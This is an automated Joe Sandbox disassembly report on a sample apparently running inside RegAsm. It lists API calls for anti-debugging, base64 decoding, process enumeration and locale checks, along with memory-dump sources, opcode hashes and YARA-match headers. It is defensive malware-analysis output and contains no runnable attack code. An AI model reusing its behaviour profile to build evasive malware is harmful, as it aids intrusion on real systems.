                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0041C68A
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041C69F
                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(8d), ref: 0041C6AA
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0041C6C6
                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0041C6CD
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                • String ID: 8d
                                                                                                                                                                                                • API String ID: 2579439406-1695097073
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                                                                                                                                                                • Instruction ID: be85914d9292e52ed3c7db91de2024766dc8ba541275e77d5d99e58d3c39953d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C4103B56043019FDB14DF24D984AA6B7E4FFA8210F10C46DE99287791E772F854CBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: e5798ae4b9202250d167ed20a71de301ed6b801862d2e07e90c0f06658bbbc10
                                                                                                                                                                                                • Instruction ID: c943329365608bcef356c2e7bc4497a4951ed6b6d4969745eab991e89950e3e3
                                                                                                                                                                                                • Opcode Fuzzy Hash: e5798ae4b9202250d167ed20a71de301ed6b801862d2e07e90c0f06658bbbc10
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E31ED75601200DFEB14CF2AD885AA6B7F5FF84365B4045BDE8428B3A2D722FC50CBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00408351
                                                                                                                                                                                                • lstrlenA.KERNEL32(00408656,00000001,?,00000014,00000000,00000000,?,00408656,00000014), ref: 0040836B
                                                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(00408656,00000000,?,00408656,00000014), ref: 00408375
                                                                                                                                                                                                • memcpy.MSVCRT ref: 004083DD
                                                                                                                                                                                                • lstrcat.KERNEL32(00424BDF,00424BE3), ref: 00408404
                                                                                                                                                                                                • lstrcat.KERNEL32(00424BDF,00424BE6), ref: 0040841C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1498829745-0
                                                                                                                                                                                                • Opcode ID: b61c0110c73c517540f519dc60546777611b21f8ea2271e5b20855ac2d69eb7e
                                                                                                                                                                                                • Instruction ID: fcf93b584ce99b9c7f430d8060aaf8ed7b5880b91b5ab1036e2ccf4652505f26
                                                                                                                                                                                                • Opcode Fuzzy Hash: b61c0110c73c517540f519dc60546777611b21f8ea2271e5b20855ac2d69eb7e
                                                                                                                                                                                                • Instruction Fuzzy Hash: FB21697590022AEBDB009F94DD44AEE7BBCEB08344F10407AF905F2251EB349A059BA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1138a4a1a112f6b40374673b640e377ff691bcec9c01edd2270a4c0152a97097
                                                                                                                                                                                                • Instruction ID: 362dc68dafdc6aecccb094933f6386c3870f24bd9cb3224ba381382066653950
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1138a4a1a112f6b40374673b640e377ff691bcec9c01edd2270a4c0152a97097
                                                                                                                                                                                                • Instruction Fuzzy Hash: 33113AB62053096BDB145B65AC42FEBF79CDF4C322F10442DF64552140EB76A81153A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004101AE
                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004101D4
                                                                                                                                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 004101E4
                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 004101F6
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041020A
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041021D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 186290926-0
                                                                                                                                                                                                • Opcode ID: 79aa73ca13b76d23adaab92a70814fb9e70b1240514686d4e12f26ad4a329d34
                                                                                                                                                                                                • Instruction ID: aaaf54095221aa9f0fc4c5608e25412c37e27e1573ba808557da3deae7a4159d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 79aa73ca13b76d23adaab92a70814fb9e70b1240514686d4e12f26ad4a329d34
                                                                                                                                                                                                • Instruction Fuzzy Hash: D1015A75900128ABDB219F95DC48ADEBBB9EF96350F204096F505E2210D7788F81CFA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1B512001
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                                                                                                                                                                • API String ID: 0-914542581
                                                                                                                                                                                                • Opcode ID: 0788a8cb4300df1d73a9a8e92d31a8e1a250c74af5bdc3701dbc4dc18e2a96db
                                                                                                                                                                                                • Instruction ID: 55fc2a2e0e09cb8caf1d5032fb4e337b33ef94bfce563c1ea7e7a9c5b5757fbb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0788a8cb4300df1d73a9a8e92d31a8e1a250c74af5bdc3701dbc4dc18e2a96db
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0721CEB5900205AFFB11AF69DC81F967BEEEF58394F004558F8889B111D363F860CBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,1B683688,?,00000000), ref: 1B683399
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,1B683688,?,00000000), ref: 1B6833C2
                                                                                                                                                                                                • GetACP.KERNEL32(?,?,1B683688,?,00000000), ref: 1B6833D7
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                                                • Opcode ID: dfa3e6b1570eacda34443177cbf96086393f97298584face2c088795e5b34245
                                                                                                                                                                                                • Instruction ID: 02b60dad9058998549bb9f9427ebed67f2773473b30bd0c64c07e2ca17a5da6a
                                                                                                                                                                                                • Opcode Fuzzy Hash: dfa3e6b1570eacda34443177cbf96086393f97298584face2c088795e5b34245
                                                                                                                                                                                                • Instruction Fuzzy Hash: EA21A7B2B04385EBD7258F54C985ACB73AAFF74E50B468464F949DB224EF32D940C390
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,EY@,00000000,00000000), ref: 004062AE
                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,EY@,?,?,00405945,00000000,?,?), ref: 004062BC
                                                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,EY@,00000000,00000000), ref: 004062D2
                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,00405945,00000000,?,?), ref: 004062E1
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                • String ID: EY@
                                                                                                                                                                                                • API String ID: 4291131564-2494902708
                                                                                                                                                                                                • Opcode ID: 5e238f24b81681bd1e218dc304b4b0d5aee478eb474be9148ccb694fddff89b6
                                                                                                                                                                                                • Instruction ID: 43e50b12db5afe856a27d0bb544b4c294b41ea24d0f69f4703884080ee459dc8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e238f24b81681bd1e218dc304b4b0d5aee478eb474be9148ccb694fddff89b6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4901E878501234BFDB215F56DC88E8B7FB9EF4ABA0B104066FA09A6250D3718950CBF4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetUserDefaultLCID.KERNEL32 ref: 1B68365A
                                                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 1B683698
                                                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 1B6836AB
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 1B6836F3
                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 1B68370E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3475089800-0
                                                                                                                                                                                                • Opcode ID: 5ace09f0643fd6edf023da7740a28bae7d4c227f0b5763484de4fda40f171a1f
                                                                                                                                                                                                • Instruction ID: a7b609a71a6b5ad30093bdfde44b0c336557b90e45ec40f318e2c516c26a7d89
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ace09f0643fd6edf023da7740a28bae7d4c227f0b5763484de4fda40f171a1f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 50517FB1A003199BDF00DFA8CCC5AEE77B8AF68700F514469F945EB290E770E544CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004024A3
                                                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024C9
                                                                                                                                                                                                • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024E3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BinaryCryptString$memset
                                                                                                                                                                                                • String ID: UNK
                                                                                                                                                                                                • API String ID: 1505698593-448974810
                                                                                                                                                                                                • Opcode ID: 24710f217eb89de3a911c962e59937511e8ad6c45f6b7a2033ea0e584d2049c4
                                                                                                                                                                                                • Instruction ID: 1db11c524df1ba3f2b3cdc5e317fdc1745e161463e274adae209a2badf0b8562
                                                                                                                                                                                                • Opcode Fuzzy Hash: 24710f217eb89de3a911c962e59937511e8ad6c45f6b7a2033ea0e584d2049c4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 48014FB260015C7EE711EA99DD81DFB77BCEB44658F1000BBB604A6181D6F8AE485A78
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 1B6348A7
                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 1B634973
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1B634993
                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 1B63499D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                • Opcode ID: 9a88d4c4e8e8cea26282c3feb9687bc2c79333e8c21b5a135b102b42a6ef9fd0
                                                                                                                                                                                                • Instruction ID: 31bc81b5b5b91e9dd87300919530258f0d202e6ea6a0361f4042dc1ef30befe3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a88d4c4e8e8cea26282c3feb9687bc2c79333e8c21b5a135b102b42a6ef9fd0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 673118B9D0521D9BDF10DFA4D9897CDBBF8EF18300F1041AAE54CAB250EB719A858F05
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
                                                                                                                                                                                                • Instruction ID: 482d3208f290f87b38d2af5aa68c266bc60a94a5c58e0d721e00763f56b9e8f9
                                                                                                                                                                                                • Opcode Fuzzy Hash: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D11E531D449527BDB628B25E840BC6FB90BF48321F058668E8999BB60D325F860C7E1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040FDBB
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00404437,?,?,?,?,?,?), ref: 0040FDC8
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00404437,?,?,?,?,?,?), ref: 0040FDCF
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1871034439-0
                                                                                                                                                                                                • Opcode ID: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                                                                                                                                                • Instruction ID: b0baf21781654d778722d2fe58ae3f68db65f40c6e5e83cc14e0cbddb1f71206
                                                                                                                                                                                                • Opcode Fuzzy Hash: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                                                                                                                                                • Instruction Fuzzy Hash: CE012971500219FFDF218FA5DC449ABBBAEFF8A350B20047AF941A3260D6359D51EBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
                                                                                                                                                                                                • Instruction ID: d2a98928f23e8ac572a924b0bdb8aa491cfea796be63eb507e3d4ff8b14d4084
                                                                                                                                                                                                • Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DE09A35004700BBCE125B51ED46E8ABFA6BF88710F044C1CF5D521570C672A860AB41
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
                                                                                                                                                                                                • Instruction ID: bc59f380206d52fb765ea42e83cc6f9ee6fb8d0cebe5d5099ac976546dd5ca40
                                                                                                                                                                                                • Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
                                                                                                                                                                                                • Instruction Fuzzy Hash: A5E0BF35004740BBCF125F52EC46F8BBFA6AF8C314F044C1CF59561470C7B2A8A1AB41
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 1B53597E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
                                                                                                                                                                                                • API String ID: 0-143322027
                                                                                                                                                                                                • Opcode ID: b00e2298a964fa2ee39e910ebb98ed6e8b295c62d6d7dc2bfbaa53eff1003cf9
                                                                                                                                                                                                • Instruction ID: ab5d777cfec054a9076f972cf23903808beb3879676356048eaad9d88ebe80e3
                                                                                                                                                                                                • Opcode Fuzzy Hash: b00e2298a964fa2ee39e910ebb98ed6e8b295c62d6d7dc2bfbaa53eff1003cf9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A113AB6500606BFEB109F55DC85FC6BBADFF89318F008555F9089B251C3B2B5A4CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 98ce99723b6345aad24377ea125308a6216303bfe646e2d251e407c47f6146cf
                                                                                                                                                                                                • Instruction ID: 31b300ac99d0818408f83239e3456e622df7c17267ed91a90e9c3dc200a7fca2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 98ce99723b6345aad24377ea125308a6216303bfe646e2d251e407c47f6146cf
                                                                                                                                                                                                • Instruction Fuzzy Hash: FE3144B4610201ABFB04EF69EC85F96B3E9FF58214F148928F959C7241E7B5F910CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: c04bdca72e0e63e8687a95d3f621364c964cbf46967514ec5f0fa986b1a92318
                                                                                                                                                                                                • Instruction ID: c11cf5350287a0d2333891451eca823124872330cfa0a9877888face8d4a11be
                                                                                                                                                                                                • Opcode Fuzzy Hash: c04bdca72e0e63e8687a95d3f621364c964cbf46967514ec5f0fa986b1a92318
                                                                                                                                                                                                • Instruction Fuzzy Hash: 78318BB5500301AFEF109F29EC85B9AB7E9EF84359F10882CF8858B361E771E990CB51
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 902a87da297e264a9e862ae0cde9f59cc3f3419bb1a04509bd1201f2d4081541
                                                                                                                                                                                                • Instruction ID: 4e7144197631f01528edef44c52db5f49491af033c9aa0f2eb6941b28e20f680
                                                                                                                                                                                                • Opcode Fuzzy Hash: 902a87da297e264a9e862ae0cde9f59cc3f3419bb1a04509bd1201f2d4081541
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3511E479A002017BFA10AF399C46FDB76AEDFC8754F14081CF985D3241EA32E91197A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • GetEnabledXStateFeatures, xrefs: 1B670C61
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
